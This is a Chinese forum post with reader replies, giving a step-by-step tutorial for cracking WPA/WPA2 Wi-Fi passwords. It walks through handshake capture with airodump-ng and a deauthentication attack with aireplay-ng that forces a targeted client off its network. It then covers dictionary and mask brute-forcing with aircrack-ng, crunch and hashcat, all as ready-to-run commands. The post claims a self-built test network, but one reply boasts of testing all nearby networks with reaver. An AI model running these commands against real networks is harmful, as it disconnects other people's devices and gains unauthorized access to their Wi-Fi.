首页
社区
课程
招聘
【破解工具】如何高速 猜出 破解 wifi密码?hashcat 运用
发表于: 2021-6-22 11:36 4678

【破解工具】如何高速 猜出 破解 wifi密码?hashcat 运用

2021-6-22 11:36
4678

前言

  • 本文仅介绍通过抓取握手包的方式破解WPA/WPA2的密码,用到的工具是Kali Linux自带的airmon-ng,以及地表最强密码破解工具hashcat(可选)。

Aircrack-ng破解wifi使用的几个套件

  • aircrack-ng 破解WEP以及WPA(字典攻击)密钥

  • airdecap-ng 通过已知密钥来解密WEP或WPA嗅探数据

  • airmon-ng 将网卡设定为监听模式

  • aireplay-ng 数据包注入工具

  • airodump-ng 数据包嗅探:将无线网络数据输送到PCAP或IVS文件并显示网络信息

WIFI破解配置要求

  • 自建WIFI进行测试

  • 外置网卡设备具备监听(RT5370)

  • 信号稳定

WIFI破解的流程-第一种情况密码简单

  • 一、插上网卡,查看是否已接入kali虚拟机

    • image-20210621175921359
  • 二、使用airmon-ng套件查看网卡是否具备监听功能

    • image-20210621180025457
  • 三、开启无线网卡监控模式

    • 命令:airmon-ng start wlan0

      • image-20210621180326463
      • image-20210621180352819
  • 四、查看周围WIFI网络

    • 命令:airodump-ng wlan0mon

      • image-20210621181347840
      • image-20210621181910481
  • 五、监听目标网络的握手包

    • 命令:airodump-ng -c 7 --bssid 46:BC:5E:47:6A:2C -w ~/1/ wlan0mon (注意:-w是写入的文件的位置)

      • image-20210621182329759
      • image-20210621183324950
  • 六、强制对方wifi断开重连(获取握手包)开起一个新窗口

      • -0 表示发起(鉴权)deauthentication攻击

      • -a 指定无限路由器BSSID

      • -c 指定强制断开的设备

    • 命令:aireplay-ng -0 50 -a 46:BC:5E:47:6A:2C -c 22:4D:0E:6F:48:73 wlan0mon

      • image-20210621184525963
      • image-20210621184557289
      • image-20210621184858614
  • 七、破解握手包密码

      • -a2代表WPA的握手包

      • -b指定要破解的wifi BSSID

      • -w 指定字典文件

      • 最后是抓取的包

    • 命令: aircrack-ng -a2 -b 46:BC:5E:47:6A:2C -w 1.txt ~/1/*.cap

      • image-20210621185111501

WIFI破解的流程-第二种情况密码复杂hashcat可以超速破解

  • 一、延续上面抓到了包

    • image-20210622105042874
  • 二、将cap转换为hashcat能够破解的形式

    • 命令:aircrack-ng /root/1/*.cap -j hashcat(将cap类型转换为hashcat可破解形式)

      • image-20210622105538241
  • 三、第一种形式是利用kali中生成的字典利用hashcat破解

    • 生成字典命令:crunch 8 8 0123456789 -o dic.txt

    • 第一个8是最小位数,第二8是最大位数,0123456789是字典中包含的数字 -o是生成dic.txt字典文件,生成纯数字字典有900M左右

      • image-20210622110024965
  • 因为我kali 是虚拟机,所以我去自己电脑使用hashcat会更快一些

  • image-20210622110305904

  • 开始跑起

    • 命令:hashcat -a 0 -m 2500 hashcat.hccapx dic.txt

      • image-20210622110454893
  • 四、第二种形式,不知道密码几位数,以及组成形式

    • 利用hashcat的掩码形式

      • 命令:hashcat -a 3 -m 2500 hashcat.hccapx --increment --increment-min 1 --increment-max 9 ?d?d?d?d?d?d?d?d?d

      • 解释:就是8-9位的数字爆破 模块2500就是WAP的模式,不懂的可以看我博客里面hashcat的解释https://gylq.github.io/2021/06/17/%E3%80%90%E7%A0%B4%E8%A7%A3%E5%B7%A5%E5%85%B7%E3%80%91Hashcat%E5%8A%A0%E5%AF%86%E7%A0%B4%E8%A7%A3/

      • image-20210622112531846

  • 最后、差不多跑了8分钟出结果,毕竟暴力破解

    • 总结:但是位数高了就不太好搞了,所以有一本好字典,是主要的,一亿的字典用hashcat差不多10分钟跑完,mask掩码是无脑,时间等待也是成倍的

    • 仅仅作于测试。


[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

最后于 2021-6-22 11:41 被孤桜懶契编辑 ,原因:
收藏
免费 11
支持
分享
最新回复 (11)
雪    币: 477
活跃值: (1412)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
强制断开?那岂不是可以把附近的人都踢掉
2021-6-22 11:42
0
雪    币: 3437
活跃值: (2973)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
搞了半天都是跑字典啊   字典不行的话跑十年都不一定出来
2021-6-22 12:42
0
雪    币: 8342
活跃值: (4286)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
学习了,谢谢分享!
2021-6-22 16:11
0
雪    币: 379
活跃值: (394)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
学习了
2021-6-22 22:25
0
雪    币: 6
活跃值: (1201)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
支持一下
2021-6-22 22:48
0
雪    币: 20
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
7

 ?d是指数字吗?


2021-7-4 09:07
0
雪    币: 3968
活跃值: (3189)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
学习了 开冲
2023-3-1 17:33
0
雪    币: 228
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
9
好怀念以前大部分都是WEP加密的时候,还有WPS PIN不限制错误数跑不了多久就出来了
2023-8-14 14:30
0
雪    币: 2172
活跃值: (2122)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
学习了谢谢分享
2023-12-23 19:22
0
雪    币: 3535
活跃值: (31011)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
感谢分享
2023-12-25 11:21
1
雪    币: 12919
活跃值: (9553)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
cctv180 好怀念以前大部分都是WEP加密的时候,还有WPS PIN不限制错误数跑不了多久就出来了[em_13]
哈哈哈哈,reaver。确实,曾经用这个把周围的无线全部给测了一遍。
2023-12-25 12:17
0
游客
登录 | 注册 方可回帖
返回
//